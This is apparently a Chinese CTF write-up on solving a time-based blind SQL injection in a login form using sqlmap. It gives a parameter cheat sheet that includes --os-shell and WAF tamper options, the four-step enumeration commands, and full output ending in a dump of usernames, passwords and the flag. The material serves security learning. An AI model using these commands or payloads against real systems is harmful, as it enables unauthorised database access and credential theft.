当前位置: 首页 > news >正文

sqlmap学习笔记ing(1.Easy_SQLi(时间,表单注入))

题解

根据题目提示,应为SQL注入,题目页面只有一个表单,用sqlmap进行表单注入。

使用--forms参数进行自动化表单注入,逐步得到flag。

### 总结参数作用:
-u        指定目标URL。
-C        指定列名(多个列用逗号分隔)。
-D        指定数据库名。
-T        指定表名。
-r        从文件加载请求,保留请求细节,自动识别注入点。
--columns       枚举指定表中的列。
--tables        枚举指定数据库中的表。
--dump          导出数据。
--dbs	        枚举所有数据库	sqlmap -u URL --dbs
--level	        测试深度(1-5)	--level 3(检测Cookie注入)
--risk	        风险等级(1-3)	--risk 3(使用危险语句)
--proxy	        使用代理	--proxy="http://127.0.0.1:8080"
--tamper	    绕过WAF	--tamper=space2comment
--forms         自动处理表单,用于自动发现表单并注入。
--batch         无需用户交互,自动选择默认选项。
--current-db    获取当前数据库名。
--dump-all	    导出所有数据	sqlmap -u URL --dump-all
--os-shell	    获取系统shell	sqlmap -u URL --os-shell
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db_____H__                                                          ___ ___[(]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  [']_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:18:50 /2025-07-01/[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql' 
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables_____H__                                                          ___ ___[,]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [,]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:27:27 /2025-07-01/[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql' 
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved: 
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns_____H__                                                          ___ ___["]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [.]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:29:34 /2025-07-01/[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql' 
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'                                                                   
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump_____H__                                                          ___ ___[.]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  ["]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:33:55 /2025-07-01/[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql' 
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+

http://www.lryc.cn/news/578350.html

相关文章:

  • Django打造智能Web机器人控制平台
  • HarmonyOS应用开发高级认证知识点梳理 (一) 布局与样式
  • 记本好书:矩阵力量:线性代数全彩图解+微课+Python编程
  • 深蓝海域承建某大型保险集团产险知识库升级项目
  • 主流零信任安全产品深度介绍
  • 11OAuth2
  • 从零到一搭建远程图像生成系统:Stable Diffusion 3.5+内网穿透技术深度实战
  • 【深度学习1】ModernBert学习
  • 发布/订阅模式:解耦系统的强大设计模式
  • Spring Boot 集成 Dufs 通过 WebDAV 实现文件管理
  • 从零到一:VNC+内网穿透技术搭建企业级远程控制系统的完整路径
  • ubuntu系统安装docker 和 mongdb,YaPi(包含中间过程不能拉去依赖问题)
  • langchain从入门到精通(三十二)——RAG优化策略(八)自查询检索器实现动态数据过滤
  • 自由学习记录(66)
  • 聚观早报 | 知乎直答新升级;特斯拉V4超级充电桩首批上线;苹果将推出廉价版Macbook
  • 缓存系统-淘汰策略
  • 边缘人工智能与医疗AI融合发展路径:技术融合与应用前景(下)
  • 定时器的设计
  • 借助飞算AI新手小白快速入门Java实操记录
  • 25-7-1 论文学习(1)- Fractal Generative Models 何恺明大佬的论文
  • 分布式爬虫数据存储开发实战
  • uv介绍以及与anaconda/venv的区别
  • SVN 分支管理(本文以Unity项目为例)
  • 【Rust操作MySql】Actix Web 框架结合 MySQL 数据库进行交互
  • Gige协议 Qt版使用文档仅供个人使用
  • Mac中如何Chrome禁用更新[update chflags macos]
  • RabbitMQ简单消息发送
  • Qt自定义外观详解
  • 大麦基于HarmonyOS星盾安全架构,打造全链路安全抢票方案
  • MySQL 中 InnoDB 存储引擎与 MyISAM 存储引擎的区别是什么?